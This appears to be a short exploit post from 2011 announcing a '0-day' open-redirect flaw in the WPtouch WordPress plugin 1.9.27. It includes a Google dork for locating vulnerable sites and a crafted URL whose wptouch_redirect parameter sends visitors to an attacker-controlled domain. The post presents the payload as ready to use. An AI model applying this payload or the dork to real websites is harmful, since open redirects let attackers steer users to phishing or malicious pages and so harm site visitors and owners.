15 lines
No EOL
614 B
Text
15 lines
No EOL
614 B
Text
Hello , that's a 0day on the must downloaded WordPress plugin.
|
|
|
|
# Exploit Title: 0-Day WPtouch WordPress Plugin 1.9.27 URL redirection
|
|
# Google Dork: intext:"Powered by Wordpress + WPtouch" (with iphone/android
|
|
User-Agent)
|
|
# Author: MaKyOtOx (special Pwet to ansx & Zizounette for #bitcoins)
|
|
# Date: 20/06/2011
|
|
# Software Link: http://wordpress.org/extend/plugins/wptouch/
|
|
# Version: 1.9.27 (not tested on previous versions)
|
|
# Tested on: WhatEver OS
|
|
# CVE : 0-Day
|
|
|
|
http://site.com/?wptouch_view=normal&wptouch_redirect=.attacker-site.com
|
|
|
|
# It would redirect to : http://site.com.attacker-site.com :) |